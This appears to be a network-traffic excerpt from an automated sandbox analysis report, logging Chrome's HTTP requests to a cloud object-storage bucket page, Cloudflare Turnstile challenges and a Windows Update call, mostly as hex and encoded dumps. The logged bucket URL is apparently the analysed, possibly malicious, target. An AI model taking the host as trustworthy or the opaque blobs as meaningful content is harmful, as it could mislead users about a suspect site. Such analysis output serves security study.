                                                                          Data Ascii: 4+Oim+FilZacoGUWXd2Yah4f3qsfIF+sICGgrSEkIa4iJGKvIyWjsCQnZLElKKbm4jAtKSeyq6eraKxjsfOoKKPkceo0tOWycm647fAl72/xKXe59q5uLfivMrG1Kytz7S22u/32Le18tLZ2c/A4Qja88TH3gn61xLO7svm/tLu6fUVD/Qe2w0Y7SAPESEW+wgJIAsc6vYcJCIdBv43OAkC+BAIFS0/QDgjOzsFAzwVHEpHBSEjDDxNDiohMSQ3


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.1649722217.142.168.14436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:53 UTC730OUTGET /favicon.ico HTTP/1.1
                                                                          Host: ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:54 UTC728INHTTP/1.1 404 Not Found
                                                                          Content-Type: application/json
                                                                          Content-Length: 41
                                                                          connection: close
                                                                          date: Tue, 29 Oct 2024 15:50:53 GMT
                                                                          opc-request-id: xsp-1:TEoIqCdcbgJzYm6bLdYin61m1YSXles0uI8V0SWaJ6d4n38eLOIBHfQ2oCk_5B1u
                                                                          x-api-id: native
                                                                          x-content-type-options: nosniff
                                                                          strict-transport-security: max-age=31536000; includeSubDomains
                                                                          access-control-allow-origin: *
                                                                          access-control-allow-methods: POST,PUT,GET,HEAD,DELETE,OPTIONS
                                                                          access-control-allow-credentials: true
                                                                          access-control-expose-headers: access-control-allow-credentials,access-control-allow-methods,access-control-allow-origin,connection,content-length,content-type,date,opc-client-info,opc-request-id,strict-transport-security,x-api-id,x-content-type-options
                                                                          2024-10-29 15:50:54 UTC41INData Raw: 7b 22 63 6f 64 65 22 3a 22 4e 6f 74 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                          Data Ascii: {"code":"NotFound","message":"Not Found"}


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.16497274.175.87.197443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:54 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=vkpk6RKulBtWzZ8&MD=S66ulWUE HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-10-29 15:50:54 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: 6b40be7e-e27e-4a28-b9dd-64a5a6ffed2e
                                                                          MS-RequestId: 865e848e-4fe1-49bc-8048-9f4d6a6951d9
                                                                          MS-CV: di7Jw2WzIEeuEi0c.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Tue, 29 Oct 2024 15:50:54 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          2024-10-29 15:50:54 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2024-10-29 15:50:54 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.1649729104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:55 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:55 UTC379INHTTP/1.1 404 Not Found
                                                                          Date: Tue, 29 Oct 2024 15:50:55 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 7
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          cf-chl-out: xboKeHMZjUXSK7hhlHTx84KQi5FkhssMQvc=$JgMVAueO5SNyJDxP
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452f2cc3928d1-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:55 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                          Data Ascii: invalid


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.1649730104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:55 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8da452d5f8116bbc/1730217053319/3a7453e024aa7751b589715d75a71c9ff23b8f410ff13e8e84dec337084828f4/8EZUA_4eRzju1Q0 HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=0
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:55 UTC143INHTTP/1.1 401 Unauthorized
                                                                          Date: Tue, 29 Oct 2024 15:50:55 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 1
                                                                          Connection: close
                                                                          2024-10-29 15:50:55 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 4f 6e 52 54 34 43 53 71 64 31 47 31 69 58 46 64 64 61 63 63 6e 5f 49 37 6a 30 45 50 38 54 36 4f 68 4e 37 44 4e 77 68 49 4b 50 51 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gOnRT4CSqd1G1iXFddaccn_I7j0EP8T6OhN7DNwhIKPQAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                          2024-10-29 15:50:55 UTC1INData Raw: 4a
                                                                          Data Ascii: J


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.1649731104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:56 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8z HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:56 UTC200INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:56 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da452fc8ce72c8d-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:56 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 2b 08 02 00 00 00 fe 2c 9f 58 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR+,XIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.1649732104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:57 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8da452d5f8116bbc/1730217053320/7BL7LlnT3QR8G8z HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:57 UTC200INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:57 GMT
                                                                          Content-Type: image/png
                                                                          Content-Length: 61
                                                                          Connection: close
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da453017dc5e7a2-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:57 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 2b 08 02 00 00 00 fe 2c 9f 58 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                          Data Ascii: PNGIHDR+,XIDAT$IENDB`


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          22192.168.2.1649733104.18.95.414436672C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-29 15:50:57 UTC1150OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/602828571:1730216247:hU1JVbyKijtdUyJpcPx_11H0qSWFqnmCkoLtpOk75jI/8da452d5f8116bbc/Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 31758
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          Content-type: application/x-www-form-urlencoded
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          CF-Challenge: Y4JbOerefBrl_xn27RO.r1PJgKAyhh88MgRHz4pkaHg-1730217050-1.1.1.1-hZ4u92QJ8.qahDCTU7tcTZODizOTEhVvtOWCRf7Vi9oLDra6izqze2UIynKjFRXc
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://challenges.cloudflare.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/s78r3/0x4AAAAAAAhNeI7hVTjvzoX5/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-29 15:50:57 UTC16384OUTData Raw: 76 5f 38 64 61 34 35 32 64 35 66 38 31 31 36 62 62 63 3d 63 42 66 51 34 69 38 53 67 54 66 6d 66 6d 53 44 46 38 34 79 31 5a 4c 70 79 53 38 43 25 32 62 79 6b 51 66 42 69 6c 79 48 79 79 64 42 69 6d 79 4e 51 54 42 69 69 79 32 69 79 44 4e 51 69 50 79 4f 51 70 67 79 50 79 6a 52 4a 4e 4e 33 79 4b 39 54 50 66 4d 51 77 4c 79 54 51 4e 79 6c 24 6f 6a 66 44 69 79 69 52 69 4a 79 4f 61 41 51 4a 39 44 51 69 70 79 76 51 69 4f 72 32 4c 71 44 66 53 79 71 51 44 4f 43 79 69 2b 68 4e 4e 79 38 61 51 38 49 4c 6e 48 61 68 79 44 24 79 69 55 6f 73 51 6b 53 68 56 66 46 79 56 67 56 37 75 6d 4d 73 78 6d 75 42 51 6b 38 24 72 77 76 69 69 51 46 51 32 48 37 79 38 57 76 79 79 6b 74 52 6a 30 5a 75 79 38 24 49 4e 34 61 56 4d 7a 43 38 74 74 79 24 75 46 59 42 75 35 35 44 74 50 43 65 6a 54 38
                                                                          Data Ascii: v_8da452d5f8116bbc=cBfQ4i8SgTfmfmSDF84y1ZLpyS8C%2bykQfBilyHyydBimyNQTBiiy2iyDNQiPyOQpgyPyjRJNN3yK9TPfMQwLyTQNyl$ojfDiyiRiJyOaAQJ9DQipyvQiOr2LqDfSyqQDOCyi+hNNy8aQ8ILnHahyD$yiUosQkShVfFyVgV7umMsxmuBQk8$rwviiQFQ2H7y8WvyyktRj0Zuy8$IN4aVMzC8tty$uFYBu55DtPCejT8
                                                                          2024-10-29 15:50:57 UTC15374OUTData Raw: 42 51 74 62 65 2d 33 49 69 68 65 6c 79 61 79 59 79 69 66 38 79 69 59 7a 49 79 75 79 30 66 79 4c 79 75 51 69 4e 38 51 79 35 79 79 79 77 4a 79 4b 67 4b 42 44 78 79 57 79 38 52 79 37 79 24 6c 57 62 42 76 79 55 73 77 66 69 4b 79 46 39 69 79 38 72 79 46 51 77 67 38 50 79 64 36 4b 39 69 46 79 35 51 63 56 44 50 79 54 4a 49 67 44 37 79 62 71 54 44 42 51 79 45 68 32 4c 42 4b 70 45 4e 6e 76 69 5a 70 34 4c 56 4e 77 53 65 38 68 34 49 55 48 4e 63 67 38 51 34 72 73 6f 68 32 4e 77 6b 6a 37 31 34 6f 79 79 79 46 32 76 38 52 79 49 61 30 74 79 6a 79 77 79 4d 61 42 74 79 70 67 63 52 77 53 79 55 2d 57 4f 64 45 37 67 4f 4b 7a 42 36 51 57 77 49 6c 79 4a 67 50 70 38 5a 55 65 67 2d 6d 79 46 69 6c 6a 5a 70 64 4c 79 67 79 46 6a 4b 6c 44 69 4e 35 61 64 2d 7a 6f 42 61 73 4b 64 42 72
                                                                          Data Ascii: BQtbe-3IihelyayYyif8yiYzIyuy0fyLyuQiN8Qy5yyywJyKgKBDxyWy8Ry7y$lWbBvyUswfiKyF9iy8ryFQwg8Pyd6K9iFy5QcVDPyTJIgD7ybqTDBQyEh2LBKpENnviZp4LVNwSe8h4IUHNcg8Q4rsoh2Nwkj714oyyyF2v8RyIa0tyjywyMaBtypgcRwSyU-WOdE7gOKzB6QWwIlyJgPp8ZUeg-myFiljZpdLygyFjKlDiN5ad-zoBasKdBr
                                                                          2024-10-29 15:50:58 UTC330INHTTP/1.1 200 OK
                                                                          Date: Tue, 29 Oct 2024 15:50:58 GMT
                                                                          Content-Type: text/plain; charset=UTF-8
                                                                          Content-Length: 26360
                                                                          Connection: close
                                                                          cf-chl-gen: 4hKYvwtSfpvF/gH52BjKm4t3tJMAsoqMSreO0BoU5vEl13MDp33wD5ntH93TVOVQVhIF2jYNTsVYHm8z$YKoGvVl5tZUnQIjt
                                                                          Server: cloudflare
                                                                          CF-RAY: 8da45303f834462f-DFW
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2024-10-29 15:50:58 UTC1039INData Raw: 6b 4a 56 74 63 59 61 4e 57 6f 70 39 6b 4a 32 55 69 56 70 63 6d 6c 61 59 6b 56 32 69 5a 34 74 68 70 6d 71 65 71 5a 31 75 5a 4b 47 72 68 35 57 4c 68 71 32 79 72 4b 75 4e 6b 4a 43 78 75 4b 36 51 6f 4c 79 2f 66 70 57 52 69 61 61 56 70 59 57 73 6d 37 2b 71 6f 4c 43 52 7a 38 32 6b 78 35 6d 33 6a 72 57 37 74 39 54 64 32 4c 32 30 30 37 62 41 75 4b 6a 47 75 4d 6a 4f 35 2b 65 2b 79 65 6a 47 77 66 54 4e 76 38 48 57 34 75 4f 35 32 4e 37 49 31 64 6e 59 76 73 33 69 35 4f 2f 49 39 39 37 6f 31 64 66 6d 34 4e 76 71 37 75 72 64 37 65 37 6b 37 68 45 55 45 2b 63 66 38 76 48 77 43 78 48 69 48 69 51 5a 39 2f 72 37 4b 79 73 64 33 78 38 62 4b 79 73 75 4a 66 30 79 4c 43 38 44 4c 43 4d 78 4d 67 2f 77 4d 44 63 6a 51 79 41 35 46 7a 74 4a 52 43 6c 49 4c 45 59 67 49 41 34 68 43 69 77
                                                                          Data Ascii: kJVtcYaNWop9kJ2UiVpcmlaYkV2iZ4thpmqeqZ1uZKGrh5WLhq2yrKuNkJCxuK6QoLy/fpWRiaaVpYWsm7+qoLCRz82kx5m3jrW7t9Td2L2007bAuKjGuMjO5+e+yejGwfTNv8HW4uO52N7I1dnYvs3i5O/I997o1dfm4Nvq7urd7e7k7hEUE+cf8vHwCxHiHiQZ9/r7Kysd3x8bKysuJf0yLC8DLCMxMg/wMDcjQyA5FztJRClILEYgIA4hCiw
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 61 68 4a 75 44 67 48 36 48 6d 58 4f 59 6f 6f 5a 74 6e 70 47 42 71 6f 5a 30 68 33 56 79 6c 4b 79 4d 6c 62 71 77 74 36 69 59 63 37 71 5a 6d 4c 4b 59 6c 62 43 30 6e 4c 2f 4d 75 4b 44 45 6d 72 79 6b 79 4c 37 47 72 4e 4b 75 30 38 4c 63 32 4c 6a 4f 6d 4a 6a 59 31 2b 47 39 32 37 47 35 35 37 6e 67 73 36 71 2f 76 2b 65 39 32 73 37 45 35 38 48 47 74 4f 2f 73 79 4e 76 58 76 64 7a 79 2f 50 66 37 75 38 4c 32 39 74 48 6d 42 51 62 57 79 51 54 4e 44 38 38 49 2f 65 33 6f 30 73 33 55 47 42 50 77 31 2f 4c 77 43 50 30 56 44 39 34 67 49 66 7a 35 47 69 45 61 39 53 59 6a 49 69 41 45 48 2b 34 54 49 65 59 56 42 78 66 32 4c 76 41 6b 45 44 54 30 4f 44 30 7a 4d 42 6f 68 45 54 30 32 4f 6a 35 44 44 42 30 6f 4c 67 30 51 4c 53 41 4d 45 69 38 53 52 45 63 6c 55 6c 63 74 4e 69 73 67 55 44
                                                                          Data Ascii: ahJuDgH6HmXOYooZtnpGBqoZ0h3VylKyMlbqwt6iYc7qZmLKYlbC0nL/MuKDEmrykyL7GrNKu08Lc2LjOmJjY1+G927G557ngs6q/v+e92s7E58HGtO/syNvXvdzy/Pf7u8L29tHmBQbWyQTND88I/e3o0s3UGBPw1/LwCP0VD94gIfz5GiEa9SYjIiAEH+4TIeYVBxf2LvAkEDT0OD0zMBohET02Oj5DDB0oLg0QLSAMEi8SREclUlctNisgUD
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 66 61 70 35 68 33 56 6c 61 6e 71 4e 73 6f 65 6a 64 4c 61 67 69 59 71 4c 72 37 69 56 65 70 7a 41 75 34 37 43 72 37 47 6e 73 35 65 2f 6d 49 69 35 6d 36 47 33 76 38 32 4f 30 4d 36 77 6f 39 65 74 6a 36 6a 44 7a 4e 61 7a 32 35 4b 32 76 4b 33 43 33 37 61 2b 75 37 48 56 76 75 76 64 79 65 53 39 78 39 33 4a 79 50 62 49 78 64 6a 4a 36 4f 54 48 79 39 48 6e 37 37 50 43 75 73 50 78 42 77 54 42 33 65 62 49 2b 41 6a 67 35 73 37 76 45 77 6e 70 35 64 54 53 30 39 55 53 32 42 73 55 32 78 58 78 46 67 38 62 42 4f 49 55 33 68 6f 6e 48 42 37 36 49 79 6a 35 49 77 77 6b 4b 66 41 32 37 69 30 61 39 65 77 78 2f 41 37 38 2b 76 77 50 4f 67 46 44 50 41 4d 2f 4d 68 78 4c 51 51 73 68 4b 53 59 44 4b 43 35 4a 4a 77 77 6d 45 54 42 53 4b 6b 52 4f 4f 43 6f 70 4f 45 49 39 58 68 34 76 57 43 63
                                                                          Data Ascii: fap5h3VlanqNsoejdLagiYqLr7iVepzAu47Cr7Gns5e/mIi5m6G3v82O0M6wo9etj6jDzNaz25K2vK3C37a+u7HVvuvdyeS9x93JyPbIxdjJ6OTHy9Hn77PCusPxBwTB3ebI+Ajg5s7vEwnp5dTS09US2BsU2xXxFg8bBOIU3honHB76Iyj5IwwkKfA27i0a9ewx/A78+vwPOgFDPAM/MhxLQQshKSYDKC5JJwwmETBSKkROOCopOEI9Xh4vWCc
                                                                          2024-10-29 15:50:58 UTC1369INData Raw: 6f 61 72 6d 72 53 77 6b 4b 5a 77 63 4c 43 76 72 59 61 6d 64 4a 53 2b 6b 61 4b 50 65 70 69 58 67 73 6d 5a 6f 4a 76 4e 6e 61 4b 66 30 61 47 6e 6f 39 57 6c 73 63 75 6e 30 73 33 4e 74 4e 7a 55 72 72 32 39 72 63 47 75 35 4c 4f 2b 79 65 4c 69 74 72 58 4a 78 4c 7a 75 79 63 4b 38 7a 2b 58 65 74 39 44 52 31 38 50 71 74 4d 2f 4b 37 38 33 4f 30 4e 38 42 2b 4f 62 65 43 64 54 68 34 38 30 51 36 65 73 51 45 67 30 57 33 73 2f 33 43 4f 48 6f 2f 4e 4c 39 31 2f 54 76 32 79 45 4e 39 64 76 2b 35 51 67 59 2f 76 6a 2b 44 2f 67 6d 2b 78 49 6a 45 42 58 78 39 42 6e 78 4b 52 58 33 38 68 6b 35 49 52 73 37 41 7a 67 42 2f 76 77 46 4e 7a 49 61 54 44 77 2b 52 43 70 49 52 45 67 75 54 46 42 4d 4d 6c 42 59 55 44 5a 55 47 43 39 68 57 6a 31 63 4d 6c 38 6b 57 53 4e 6b 5a 56 4e 4e 4b 32 35 4e
                                                                          Data Ascii: oarmrSwkKZwcLCvrYamdJS+kaKPepiXgsmZoJvNnaKf0aGno9Wlscun0s3NtNzUrr29rcGu5LO+yeLitrXJxLzuycK8z+Xet9DR18PqtM/K783O0N8B+ObeCdTh480Q6esQEg0W3s/3COHo/NL91/Tv2yEN9dv+5QgY/vj+D/gm+xIjEBXx9BnxKRX38hk5IRs7AzgB/vwFNzIaTDw+RCpIREguTFBMMlBYUDZUGC9hWj1cMl8kWSNkZVNNK25N
